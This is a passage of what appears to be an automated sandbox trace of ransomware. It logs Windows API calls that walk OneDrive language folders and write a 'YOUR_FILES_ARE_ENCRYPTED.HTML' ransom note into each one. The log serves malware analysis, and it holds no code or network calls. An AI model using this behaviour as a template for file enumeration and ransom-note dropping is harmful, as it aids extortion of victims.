dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.572] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81b3eb6a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x81b3eb6a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x81b3eb6a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="gu", cAlternateFileName="")) returned 1 [0113.572] StrStrIW (lpFirst="gu", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.572] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gu") returned 78 [0113.572] GetProcessHeap () returned 0x600000 [0113.572] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.572] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gu" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gu") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gu" [0113.572] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gu\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gu\\*" [0113.572] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gu\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81b3eb6a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x81b3eb6a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x81ef8607, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.573] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81b3eb6a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x81b3eb6a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x81ef8607, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.573] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81ef8607, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x81ef8607, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x827e93a9, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x158c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.573] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.573] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gu\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.574] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.574] lstrlenW (lpString=".mui") returned 4 [0113.574] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.574] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81ef8607, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x81ef8607, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x827e93a9, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x158c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.574] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.574] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gu\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.574] GetProcessHeap () returned 0x600000 [0113.574] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gu\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\gu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0113.574] WriteFile (in: hFile=0x308, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.575] CloseHandle (hObject=0x308) returned 1 [0113.575] GetProcessHeap () returned 0x600000 [0113.575] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.575] GetProcessHeap () returned 0x600000 [0113.575] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.575] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x827e93a9, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x827e93a9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x827e93a9, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ha-latn-ng", cAlternateFileName="HA-LAT~1")) returned 1 [0113.575] StrStrIW (lpFirst="ha-latn-ng", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.575] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ha-latn-ng") returned 86 [0113.575] GetProcessHeap () returned 0x600000 [0113.575] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.575] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ha-latn-ng" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ha-latn-ng") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ha-latn-ng" [0113.575] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ha-latn-ng", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ha-latn-ng\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ha-latn-ng\\*" [0113.575] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ha-latn-ng\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x827e93a9, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x827e93a9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x82cd3f98, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.580] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x827e93a9, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x827e93a9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x82cd3f98, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.580] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82cd3f98, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x82cd3f98, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x83126441, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x154c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.580] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.580] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ha-latn-ng\\FileSync.LocalizedResources.dll.mui") returned 122 [0113.580] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.580] lstrlenW (lpString=".mui") returned 4 [0113.580] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.580] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82cd3f98, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x82cd3f98, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x83126441, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x154c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.580] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.580] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ha-latn-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0113.580] GetProcessHeap () returned 0x600000 [0113.580] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ha-latn-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ha-latn-ng\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.581] WriteFile (in: hFile=0x330, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.582] CloseHandle (hObject=0x330) returned 1 [0113.582] GetProcessHeap () returned 0x600000 [0113.582] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.582] GetProcessHeap () returned 0x600000 [0113.582] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.582] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x832eff32, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x832eff32, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x832eff32, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="he", cAlternateFileName="")) returned 1 [0113.582] StrStrIW (lpFirst="he", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.582] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\he") returned 78 [0113.582] GetProcessHeap () returned 0x600000 [0113.582] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.582] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\he" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\he") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\he" [0113.582] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\he", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\he\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\he\\*" [0113.582] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\he\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x832eff32, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x832eff32, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x834939f4, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.583] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x832eff32, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x832eff32, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x834939f4, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.583] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x834939f4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x834939f4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8352c4e5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x126c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.583] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.583] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\he\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.583] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.583] lstrlenW (lpString=".mui") returned 4 [0113.583] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.583] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x834939f4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x834939f4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8352c4e5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x126c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.583] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.593] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\he\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.593] GetProcessHeap () returned 0x600000 [0113.593] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\he\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\he\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.594] WriteFile (in: hFile=0x330, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.595] CloseHandle (hObject=0x330) returned 1 [0113.596] GetProcessHeap () returned 0x600000 [0113.596] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.596] GetProcessHeap () returned 0x600000 [0113.596] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.596] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8352c4e5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8352c4e5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8352c4e5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="hi", cAlternateFileName="")) returned 1 [0113.596] StrStrIW (lpFirst="hi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.596] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hi") returned 78 [0113.596] GetProcessHeap () returned 0x600000 [0113.596] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.596] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hi" [0113.596] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hi", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hi\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hi\\*" [0113.596] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hi\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8352c4e5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8352c4e5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x836f6330, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0113.596] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8352c4e5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8352c4e5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x836f6330, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.596] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x836f6330, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x836f6330, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x837b4d08, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.596] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.596] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hi\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.596] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.596] lstrlenW (lpString=".mui") returned 4 [0113.596] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.596] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x836f6330, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x836f6330, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x837b4d08, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.596] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0113.596] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hi\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.596] GetProcessHeap () returned 0x600000 [0113.597] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.597] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\hi\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\hi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.597] WriteFile (in: hFile=0x330, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.598] CloseHandle (hObject=0x330) returned 1 [0113.598] GetProcessHeap () returned 0x600000 [0113.598] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.598] GetProcessHeap () returned 0x600000 [0113.598] HeapFree (in: hHeap=0x600000, dwFlags=0x0, 